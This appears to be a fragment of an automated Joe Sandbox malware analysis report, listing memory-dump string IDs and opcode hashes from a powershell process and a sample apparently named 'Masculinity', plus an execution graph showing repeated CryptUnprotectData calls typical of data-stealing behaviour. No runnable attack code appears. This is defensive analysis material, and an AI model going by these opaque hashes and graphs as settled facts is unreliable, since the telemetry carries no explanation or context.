                                              • Instruction Fuzzy Hash: B96105F0B142059FDB2ACF94D4416B6BBB6AFA5250F1680AEE8819B2D9C731DC41C7A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$84pl$d%iq$d%iq$d%iq$tPcq$$cq
                                              • API String ID: 0-10998374
                                              • Opcode ID: 5b0a93ef000e6525db2839067b8a06b6afba03818a56fe203fa21b320b086316
                                              • Instruction ID: c90627bb76c9cda339a0f92817df11b26f04d41a8877368bbb6fdea3f65ff167
                                              • Opcode Fuzzy Hash: 5b0a93ef000e6525db2839067b8a06b6afba03818a56fe203fa21b320b086316
                                              • Instruction Fuzzy Hash: 3151C3F0B102059FDB29CF94D5406BABBF6AFA5250F1680ADE8819B2D9C731DD41CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$4'cq$4'cq$4'cq$x.ck$-ck
                                              • API String ID: 0-173980018
                                              • Opcode ID: 3c260b10ebc9d6c97ff86e8fe56e1f5193cdbbbc00dd90bc4fb7dabefda2d9bd
                                              • Instruction ID: 50032f3dc870e4c6f3a9c4c1feb61ceaef933c9c4151225ee471ee885c532be5
                                              • Opcode Fuzzy Hash: 3c260b10ebc9d6c97ff86e8fe56e1f5193cdbbbc00dd90bc4fb7dabefda2d9bd
                                              • Instruction Fuzzy Hash: 92123FB4A00219DFDB64DF68C951B9ABBB2FB84304F1085D9D5096B381CB76EE81CF91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$84pl$tPcq$$cq$$cq$$cq
                                              • API String ID: 0-3839080207
                                              • Opcode ID: 4c3eb344a1eb680de02714ed9dec1b175d372f9e6ae9f38c0f8931bee53e51b6
                                              • Instruction ID: e8c97ce74e4e86c20cd4a07279752d09f1aa165bc371955b29884b923209d10e
                                              • Opcode Fuzzy Hash: 4c3eb344a1eb680de02714ed9dec1b175d372f9e6ae9f38c0f8931bee53e51b6
                                              • Instruction Fuzzy Hash: 056134F062020ADFDB2ACE94C5407BA77B6BF61341F59846EE8006B2D4C735DD88CBA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$84pl$tPcq$$cq$$cq$$cq
                                              • API String ID: 0-3839080207
                                              • Opcode ID: d063c58fd6e4d4238d7afefc6364b8e1647d0589e3e83ccb760143f16680b0d8
                                              • Instruction ID: 076d2f7f093cadfabeb6761960a0e038889975aea020befdb472ec14554b5c7c
                                              • Opcode Fuzzy Hash: d063c58fd6e4d4238d7afefc6364b8e1647d0589e3e83ccb760143f16680b0d8
                                              • Instruction Fuzzy Hash: 7C6123F061020ADFEB2ACE84C540BBA77B6BF65351F59846DE8006B2D4C731DD98CBA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$84pl$d%iq$d%iq$d%iq$tPcq
                                              • API String ID: 0-1937886691
                                              • Opcode ID: e99c8674f887e7255425143dc3b760021dd5b832d1cd17b3778bc2e892c856de
                                              • Instruction ID: 2a3582129ff988bbceba7839c80c23aeafc9a8205aa93046ed60868ba6e59138
                                              • Opcode Fuzzy Hash: e99c8674f887e7255425143dc3b760021dd5b832d1cd17b3778bc2e892c856de
                                              • Instruction Fuzzy Hash: F031B3B0B00215DFCB29DF98D451A6AFBF2BBA8710F15816DE845AB385C731DC01CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$4'cq$$cq$$cq$$cq
                                              • API String ID: 0-838516036
                                              • Opcode ID: 41d81b80ca8c7b9c42d9d3a5321dc3d96e5912e21c89ce7451361aff689450d2
                                              • Instruction ID: f1a640e8c0e031591420f18a2fab7b34707f093d139c263b48e29447ac021321
                                              • Opcode Fuzzy Hash: 41d81b80ca8c7b9c42d9d3a5321dc3d96e5912e21c89ce7451361aff689450d2
                                              • Instruction Fuzzy Hash: 3D4104B1B14356DFCB269FB48C116AB7BB29FDA210F05446EDA018B2D1DB36C941C7A2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 84pl$XRhq$XRhq$tPcq$$cq
                                              • API String ID: 0-2137930300
                                              • Opcode ID: eca0aed36ab8b00252858dfc761403f2279f9c8d292e6b527db00069e6ea53bd
                                              • Instruction ID: b63a3de7497ff7c1895539e39075be5f3a1237e85c47a1292a8774f8318b361c
                                              • Opcode Fuzzy Hash: eca0aed36ab8b00252858dfc761403f2279f9c8d292e6b527db00069e6ea53bd
                                              • Instruction Fuzzy Hash: 5541D4B2A00206DFDB29CF98C144AAAB7FBAF55710F1AC09ED4046B2D5C731DD42CB51
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 84pl$XRhq$XRhq$tPcq$$cq
                                              • API String ID: 0-2137930300
                                              • Opcode ID: a4ac553c902a24db9a0396593c8fffa0f060524c8a1aad2627ea73f3fed417ae
                                              • Instruction ID: 2e98db38ed2a98f34ae24d0d1fe15141e131e5931b15ac4761ac7fd1a7cdbcbc
                                              • Opcode Fuzzy Hash: a4ac553c902a24db9a0396593c8fffa0f060524c8a1aad2627ea73f3fed417ae
                                              • Instruction Fuzzy Hash: B241D4B2A00206DBDB25CF88C144AAAB7FBAF58B10F1AC09DD4156B2D4C731DD42CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $cq$$cq$$cq$hl$hl
                                              • API String ID: 0-190700548
                                              • Opcode ID: 6cadfa7538392f6876e40562aa9642728887b4a3da863724426078a8d81780d7
                                              • Instruction ID: 7123c2e0c170b028b04adbada759b2e6bf2b53913b183568992a8f2b94387bc5
                                              • Opcode Fuzzy Hash: 6cadfa7538392f6876e40562aa9642728887b4a3da863724426078a8d81780d7
                                              • Instruction Fuzzy Hash: 8711ECB571031E9BDB37D99AE808727B796AFE1720F2CC02EE5498A2C1DB75C841C361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (ocq$(ocq$(ocq$(ocq
                                              • API String ID: 0-2003149739
                                              • Opcode ID: a6dd6b9620e82cec13a6af0f600fcfa3fdba17315496abea19bfc0d7d116676f
                                              • Instruction ID: 7fdf18dbf0ce596d91d323f4ed5feafd2b32ecb844f8f366ec548b4f033e7bfe
                                              • Opcode Fuzzy Hash: a6dd6b9620e82cec13a6af0f600fcfa3fdba17315496abea19bfc0d7d116676f
                                              • Instruction Fuzzy Hash: 8CF157B1704306DFDB16DFA8E8417AA7BA2EF96310F15807EE4858B2D1CB31D851CB61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 84pl$84pl$tPcq$tPcq
                                              • API String ID: 0-1443535603
                                              • Opcode ID: 0cff186428be373dc98a05eb7860912aa7236cc0300e513d20cc5be713c94287
                                              • Instruction ID: 00c79292e96257b6c6a0fd5515370995f850fe38c7803affe96cd45d3434817c
                                              • Opcode Fuzzy Hash: 0cff186428be373dc98a05eb7860912aa7236cc0300e513d20cc5be713c94287
                                              • Instruction Fuzzy Hash: D19138B17102069FCB25DEA9C850B7BBBA6BFE5310F28846ED8059B2D1CF31D941C7A1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (frl$(frl$(frl$(frl
                                              • API String ID: 0-3675676250
                                              • Opcode ID: a043e011ed6f587f756d3e6365679ee48ded7cc26c3a2f1cf026a5683cd3f72f
                                              • Instruction ID: 8b29a179a1a5bcfd4e877f10181c0fd1a966cc50f23d918fff8bac69867f465a
                                              • Opcode Fuzzy Hash: a043e011ed6f587f756d3e6365679ee48ded7cc26c3a2f1cf026a5683cd3f72f
                                              • Instruction Fuzzy Hash: F3718EB0A10205DBCB14CF98C542A6EBBB3EF99320F2580ADD805AB394DB31ED51CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $cq$$cq$$cq$$cq
                                              • API String ID: 0-2876200767
                                              • Opcode ID: 98d4ff26999d5c355d845966ae26260bf52977d13f68e7e02722628e3f36b4e1
                                              • Instruction ID: f20ab36fdb2be7088f6950caa6d6998bd5543910209702aad01641534762e135
                                              • Opcode Fuzzy Hash: 98d4ff26999d5c355d845966ae26260bf52977d13f68e7e02722628e3f36b4e1
                                              • Instruction Fuzzy Hash: DA2129B171031E9BDB2AD9BA9942727769A9FE5712F24C02EA546CB3C1CF35C842C361
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $cq$$cq$$cq$$cq
                                              • API String ID: 0-2876200767
                                              • Opcode ID: 7ea432092ff122bc4634e9d9b94155b0a91d5960ed55139e440606061fa94943
                                              • Instruction ID: 90ed622c1765cfaf2f97f288e5947c07a1cb0d5efe49e244fd3f9e7e329f7b69
                                              • Opcode Fuzzy Hash: 7ea432092ff122bc4634e9d9b94155b0a91d5960ed55139e440606061fa94943
                                              • Instruction Fuzzy Hash: 7A21F1B5A0530ADFCF26CFA4C6066B6BBB1BFA1200F55406ED805876C2D775C544CFA2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2676400609.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4'cq$4'cq$$cq$$cq
                                              • API String ID: 0-1126079151
                                              • Opcode ID: f25846f5346f49c28d999a1a96a70b4deeaddc75d2ec0f8b7004e4cf5ad17f00
                                              • Instruction ID: d4e5738271010231b939c43e1349924bd0f0c7103edd1b79be0fa8db288f519d
                                              • Opcode Fuzzy Hash: f25846f5346f49c28d999a1a96a70b4deeaddc75d2ec0f8b7004e4cf5ad17f00
                                              • Instruction Fuzzy Hash: 2201D82031A7868FC73797A81C211666FB26FD7250B5A509FC041CB2C7CB194C4583A2

                                              Execution Graph

                                              Execution Coverage:9.1%
                                              Dynamic/Decrypted Code Coverage:74.7%
                                              Signature Coverage:22.3%
                                              Total number of Nodes:229
                                              Total number of Limit Nodes:18
                                              execution_graph 53704 4a69e80 53705 4a69e87 53704->53705 53707 4a69e8d 53704->53707 53705->53707 53709 4a6a20e 53705->53709 53710 4a69590 53705->53710 53708 4a69590 LdrInitializeThunk 53708->53709 53709->53707 53709->53708 53711 4a695a2 53710->53711 53712 4a695a7 53710->53712 53711->53709 53712->53711 53713 4a69cd1 LdrInitializeThunk 53712->53713 53713->53711 53714 15e2a8 53715 15e2b4 53714->53715 53753 4a62970 53715->53753 53717 15e35a 53764 4a6fa78 53717->53764 53718 15e3a0 53768 4a97b69 53718->53768 53777 4a97b78 53718->53777 53786 4a97b77 53718->53786 53719 15e464 53795 4ab5b37 53719->53795 53804 4ab5b48 53719->53804 53720 15e575 53813 4ab60d8 53720->53813 53820 4ab61e8 53720->53820 53721 15e57c 53827 4e01828 53721->53827 53834 4e01818 53721->53834 53722 15e686 53841 4e01cf0 53722->53841 53848 4e01cdf 53722->53848 53723 15e68d 53855 4e07d22 53723->53855 53862 4e07d20 53723->53862 53724 15e797 53869 4e07f99 53724->53869 53876 4e07fa8 53724->53876 53725 15e79e 53883 4e0f668 53725->53883 53890 4e0f65b 53725->53890 53726 15e8a8 53897 4df6d90 53726->53897 53904 4df6da0 53726->53904 53727 15e9c0 53911 4dfcdd0 53727->53911 53918 4dfcdc1 53727->53918 53728 15eaca 53754 4a62992 53753->53754 53755 15e353 53754->53755 53758 4a69590 LdrInitializeThunk 53754->53758 53925 4a69b94 53754->53925 53931 4a697b0 53754->53931 53937 4a69580 53754->53937 53760 4a6cf08 53755->53760 53758->53755 53761 4a6cf2a 53760->53761 53762 4a697b0 2 API calls 53761->53762 53763 4a6cff4 53761->53763 53762->53763 53763->53717 53765 4a6fa9a 53764->53765 53766 4a697b0 2 API calls 53765->53766 53767 4a6fb64 53765->53767 53766->53767 53767->53718 53769 4a97b70 53768->53769 53770 4a98029 53769->53770 53772 4a69b94 2 API calls 53769->53772 53773 4a69580 2 API calls 53769->53773 53774 4a69590 LdrInitializeThunk 53769->53774 53775 4a697b0 2 API calls 53769->53775 53770->53719 53771 4a97cac 53771->53770 53943 4a98431 53771->53943 53772->53771 53773->53771 53774->53771 53775->53771 53779 4a97b9a 53777->53779 53778 4a98029 53778->53719 53779->53778 53781 4a69b94 2 API calls 53779->53781 53782 4a69580 2 API calls 53779->53782 53783 4a69590 LdrInitializeThunk 53779->53783 53784 4a697b0 2 API calls 53779->53784 53780 4a97cac 53780->53778 53785 4a98431 CryptUnprotectData 53780->53785 53781->53780 53782->53780 53783->53780 53784->53780 53785->53780 53788 4a97b9a 53786->53788 53787 4a98029 53787->53719 53788->53787 53790 4a69b94 2 API calls 53788->53790 53791 4a69580 2 API calls 53788->53791 53792 4a69590 LdrInitializeThunk 53788->53792 53793 4a697b0 2 API calls 53788->53793 53789 4a97cac 53789->53787 53794 4a98431 CryptUnprotectData 53789->53794 53790->53789 53791->53789 53792->53789 53793->53789 53794->53789 53796 4ab5b6a 53795->53796 53797 4ab6039 53796->53797 53799 4a69b94 2 API calls 53796->53799 53800 4a69580 2 API calls 53796->53800 53801 4a69590 LdrInitializeThunk 53796->53801 53802 4a697b0 2 API calls 53796->53802 53797->53720 53798 4ab5c84 53798->53797 53803 4a98431 CryptUnprotectData 53798->53803 53799->53798 53800->53798 53801->53798 53802->53798 53803->53798 53805 4ab5b6a 53804->53805 53806 4ab6039 53805->53806 53809 4a69b94 2 API calls 53805->53809 53810 4a69580 2 API calls 53805->53810 53811 4a69590 LdrInitializeThunk 53805->53811 53812 4a697b0 2 API calls 53805->53812 53806->53720 53807 4ab5c84 53807->53806 53808 4a98431 CryptUnprotectData 53807->53808 53808->53807 53809->53807 53810->53807 53811->53807 53812->53807 53814 4ab60e6 53813->53814 53815 4ab62dd 53814->53815 53816 4a69b94 2 API calls 53814->53816 53817 4a69580 2 API calls 53814->53817 53818 4a69590 LdrInitializeThunk 53814->53818 53819 4a697b0 2 API calls 53814->53819 53815->53721 53816->53815 53817->53815 53818->53815 53819->53815 53821 4ab620a 53820->53821 53822 4ab62dd 53821->53822 53823 4a69b94 2 API calls 53821->53823 53824 4a69580 2 API calls 53821->53824 53825 4a69590 LdrInitializeThunk 53821->53825 53826 4a697b0 2 API calls 53821->53826 53822->53721 53823->53822 53824->53822 53825->53822 53826->53822 53828 4e0184a 53827->53828 53829 4e0191d 53828->53829 53830 4a69b94 2 API calls 53828->53830 53831 4a69580 2 API calls 53828->53831 53832 4a69590 LdrInitializeThunk 53828->53832 53833 4a697b0 2 API calls 53828->53833 53829->53722 53830->53829 53831->53829 53832->53829 53833->53829 53835 4e0184a 53834->53835 53836 4e0191d 53835->53836 53837 4a69b94 2 API calls 53835->53837 53838 4a69580 2 API calls 53835->53838 53839 4a69590 LdrInitializeThunk 53835->53839 53840 4a697b0 2 API calls 53835->53840 53836->53722 53837->53836 53838->53836 53839->53836 53840->53836 53842 4e01d0c 53841->53842 53843 4e01db7 53842->53843 53844 4a69b94 2 API calls 53842->53844 53845 4a69580 2 API calls 53842->53845 53846 4a69590 LdrInitializeThunk 53842->53846 53847 4a697b0 2 API calls 53842->53847 53843->53723 53844->53843 53845->53843 53846->53843 53847->53843 53849 4e01cf2 53848->53849 53850 4e01db7 53849->53850 53851 4a69b94 2 API calls 53849->53851 53852 4a69580 2 API calls 53849->53852 53853 4a69590 LdrInitializeThunk 53849->53853 53854 4a697b0 2 API calls 53849->53854 53850->53723 53851->53850 53852->53850 53853->53850 53854->53850 53856 4e07d3c 53855->53856 53857 4e07de7 53856->53857 53858 4a69b94 2 API calls 53856->53858 53859 4a69580 2 API calls 53856->53859 53860 4a69590 LdrInitializeThunk 53856->53860 53861 4a697b0 2 API calls 53856->53861 53857->53724 53858->53857 53859->53857 53860->53857 53861->53857 53863 4e07d3c 53862->53863 53864 4e07de7 53863->53864 53865 4a69b94 2 API calls 53863->53865 53866 4a69580 2 API calls 53863->53866 53867 4a69590 LdrInitializeThunk 53863->53867 53868 4a697b0 2 API calls 53863->53868 53864->53724 53865->53864 53866->53864 53867->53864 53868->53864 53870 4e07fca 53869->53870 53871 4e0807a 53870->53871 53872 4a69b94 2 API calls 53870->53872 53873 4a69580 2 API calls 53870->53873 53874 4a69590 LdrInitializeThunk 53870->53874 53875 4a697b0 2 API calls 53870->53875 53871->53725 53872->53871 53873->53871 53874->53871 53875->53871 53877 4e07fca 53876->53877 53878 4e0807a 53877->53878 53879 4a69b94 2 API calls 53877->53879 53880 4a69580 2 API calls 53877->53880 53881 4a69590 LdrInitializeThunk 53877->53881 53882 4a697b0 2 API calls 53877->53882 53878->53725 53879->53878 53880->53878 53881->53878 53882->53878 53884 4e0f68a 53883->53884 53885 4e0f73a 53884->53885 53886 4a69b94 2 API calls 53884->53886 53887 4a69580 2 API calls 53884->53887 53888 4a69590 LdrInitializeThunk 53884->53888 53889 4a697b0 2 API calls 53884->53889 53885->53726 53886->53885 53887->53885 53888->53885 53889->53885 53891 4e0f68a 53890->53891 53892 4e0f73a 53891->53892 53893 4a69b94 2 API calls 53891->53893 53894 4a69580 2 API calls 53891->53894 53895 4a69590 LdrInitializeThunk 53891->53895 53896 4a697b0 2 API calls 53891->53896 53892->53726 53893->53892 53894->53892 53895->53892 53896->53892 53898 4df6d8d 53897->53898 53898->53897 53899 4df6e67 53898->53899 53900 4a69b94 2 API calls 53898->53900 53901 4a69580 2 API calls 53898->53901 53902 4a69590 LdrInitializeThunk 53898->53902 53903 4a697b0 2 API calls 53898->53903 53899->53727 53900->53899 53901->53899 53902->53899 53903->53899 53905 4df6dbc 53904->53905 53906 4df6e67 53905->53906 53907 4a69b94 2 API calls 53905->53907 53908 4a69580 2 API calls 53905->53908 53909 4a69590 LdrInitializeThunk 53905->53909 53910 4a697b0 2 API calls 53905->53910 53906->53727 53907->53906 53908->53906 53909->53906 53910->53906 53912 4dfcdec 53911->53912 53913 4dfce97 53912->53913 53914 4a69b94 2 API calls 53912->53914 53915 4a69580 2 API calls 53912->53915 53916 4a69590 LdrInitializeThunk 53912->53916 53917 4a697b0 2 API calls 53912->53917 53913->53728 53914->53913 53915->53913 53916->53913 53917->53913 53920 4dfcdc4 53918->53920 53919 4dfce97 53919->53728 53920->53919 53921 4a69b94 2 API calls 53920->53921 53922 4a69580 2 API calls 53920->53922 53923 4a69590 LdrInitializeThunk 53920->53923 53924 4a697b0 2 API calls 53920->53924 53921->53919 53922->53919 53923->53919 53924->53919 53926 4a69a4b 53925->53926 53927 4a69b8c LdrInitializeThunk 53926->53927 53930 4a69590 LdrInitializeThunk 53926->53930 53929 4a69ce9 53927->53929 53929->53755 53930->53926 53936 4a697e1 53931->53936 53932 4a69941 53932->53755 53933 4a69b8c LdrInitializeThunk 53933->53932 53935 4a69590 LdrInitializeThunk 53935->53936 53936->53932 53936->53933 53936->53935 53938 4a695a2 53937->53938 53942 4a695a7 53937->53942 53938->53755 53939 4a69b8c LdrInitializeThunk 53939->53938 53941 4a69590 LdrInitializeThunk 53941->53942 53942->53938 53942->53939 53942->53941 53944 4a98440 53943->53944 53948 4a98a59 53944->53948 53956 4a98a68 53944->53956 53945 4a984b0 53945->53771 53949 4a98a8d 53948->53949 53952 4a98b41 53948->53952 53949->53952 53953 4a98a59 CryptUnprotectData 53949->53953 53954 4a98a68 CryptUnprotectData 53949->53954 53964 4a98c4a 53949->53964 53968 4a986dc 53952->53968 53953->53952 53954->53952 53957 4a98a8d 53956->53957 53958 4a98b41 53956->53958 53957->53958 53961 4a98a59 CryptUnprotectData 53957->53961 53962 4a98a68 CryptUnprotectData 53957->53962 53963 4a98c4a CryptUnprotectData 53957->53963 53959 4a986dc CryptUnprotectData 53958->53959 53960 4a98d0d 53959->53960 53960->53945 53961->53958 53962->53958 53963->53958 53965 4a98c5d 53964->53965 53966 4a986dc CryptUnprotectData 53965->53966 53967 4a98d0d 53966->53967 53967->53952 53969 4a98ef8 CryptUnprotectData 53968->53969 53970 4a98d0d 53969->53970 53970->53945

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 146 1529e0-152a3b 150 152a5d-152aac 146->150 151 152a3d-152a5c 146->151 155 152ac7-152acf 150->155 156 152aae-152ab5 150->156 159 152ad2-152ae6 155->159 157 152ab7-152abc 156->157 158 152abe-152ac5 156->158 157->159 158->159 162 152afc-152b04 159->162 163 152ae8-152aef 159->163 166 152b06-152b0a 162->166 164 152af5-152afa 163->164 165 152af1-152af3 163->165 164->166 165->166 168 152b0c-152b21 166->168 169 152b6a-152b6d 166->169 168->169 177 152b23-152b26 168->177 170 152bb5-152bbb 169->170 171 152b6f-152b84 169->171 172 1536b6 170->172 173 152bc1-152bc3 170->173 171->170 181 152b86-152b8a 171->181 178 1536bb-153c65 172->178 173->172 175 152bc9-152bce 173->175 179 153664-153668 175->179 180 152bd4 175->180 182 152b45-152b63 call 1502c8 177->182 183 152b28-152b2a 177->183 200 153c69-153ca4 178->200 185 15366f-1536b5 179->185 186 15366a-15366d 179->186 180->179 187 152b92-152bb0 call 1502c8 181->187 188 152b8c-152b90 181->188 182->169 183->182 189 152b2c-152b2f 183->189 186->178 186->185 187->170 188->170 188->187 189->169 190 152b31-152b43 189->190 190->169 190->182 200->200 202 153ca6-153cd9 200->202 206 153cdb-153cdd 202->206 207 153cea-153cf2 202->207 208 153ce3-153ce8 206->208 209 153cdf-153ce1 206->209 210 153cf4-153d02 207->210 208->210 209->210 213 153d04-153d06 210->213 214 153d18-153d20 210->214 215 153d0f-153d16 213->215 216 153d08-153d0d 213->216 217 153d23-153d26 214->217 215->217 216->217 219 153d3d-153d41 217->219 220 153d28-153d36 217->220 221 153d43-153d51 219->221 222 153d5a-153d5d 219->222 220->219 226 153d38 220->226 221->222 231 153d53 221->231 224 153d65-153d9a 222->224 225 153d5f-153d63 222->225 233 153dfc-153e01 224->233 225->224 228 153d9c-153db3 225->228 226->219 229 153db5-153db7 228->229 230 153db9-153dc5 228->230 229->233 234 153dc7-153dcd 230->234 235 153dcf-153dd9 230->235 231->222 236 153de1 234->236 235->236 237 153ddb 235->237 239 153de9-153df5 236->239 237->236 239->233
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3271868483.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_150000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Xgq$Xgq$Xgq$Xgq$Xgq$Xgq
                                              • API String ID: 0-3143122102
                                              • Opcode ID: 168d2c7382a800d40e973decd957286b975ccb2bf88ea8420d259a60d714d0bd
                                              • Instruction ID: b361447c4737af9e849e287c3987433f7a292a8209f276f70b8ce66c772b34de
                                              • Opcode Fuzzy Hash: 168d2c7382a800d40e973decd957286b975ccb2bf88ea8420d259a60d714d0bd
                                              • Instruction Fuzzy Hash: 11324D6690D7D48FCB638B744CE815B7FB16B92205B8945DFC4C78B687EB288609C362

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 454 4e841bc-4e843e8 457 4e843ea 454->457 458 4e843ef-4e8446d 454->458 457->458 460 4e84473-4e84585 458->460 461 4e847e4-4e84845 458->461 492 4e845af 460->492 493 4e84587-4e84593 460->493 468 4e8484b-4e84aa9 461->468 469 4e84b90-4e84eb1 461->469 556 4e84aab-4e84ac0 468->556 557 4e84ac2-4e84ad3 468->557 578 4e84eca-4e84edb 469->578 579 4e84eb3-4e84ec8 469->579 494 4e845b5-4e8479a 492->494 495 4e8459d-4e845a3 493->495 496 4e84595-4e8459b 493->496 565 4e847a9 494->565 566 4e8479c-4e847a8 494->566 499 4e845ad 495->499 496->499 499->494 564 4e84ad4-4e84ae0 556->564 557->564 699 4e84ae6 call 4e858e0 564->699 700 4e84ae6 call 4e858d0 564->700 565->461 566->565 568 4e84aec-4e84b4d 580 4e84b55-4e84b8f 568->580 583 4e84edc-4e84fc8 578->583 579->583 580->469 595 4e854f9-4e85527 583->595 596 4e84fce-4e850d8 583->596 599 4e8552d-4e8576f 595->599 600 4e85770-4e857a4 595->600 632 4e852bd-4e854ca 596->632 633 4e850de-4e852b8 596->633 599->600 605 4e857aa-4e858b5 600->605 606 4e858b6 600->606 605->606 607 4e858b7-4e858bd 606->607 632->607 695 4e854f8 632->695 633->695 695->595 699->568 700->568
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.3276010631.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4e80000_Masculinity.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: & $,! L! p! $Tecq$Tecq$h
                                              • API String ID: 0-4194517112
                                              • Opcode ID: 5eaf47ca411d1d3c436e70ccccf79b12f487c6e6009d6490381fa054c77cb0e3
                                              • Instruction ID: 8dd82ac5426f98290a743d1735b60d5c4a1106238fab1eb7a67038f199d0157c
                                              • Opcode Fuzzy Hash: 5eaf47ca411d1d3c436e70ccccf79b12f487c6e6009d6490381fa054c77cb0e3
                                              • Instruction Fuzzy Hash: 61C2B174A41229CFDB65DF24C994BAEB7B2FB89300F5081E9D809A7365DB359E81CF40

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
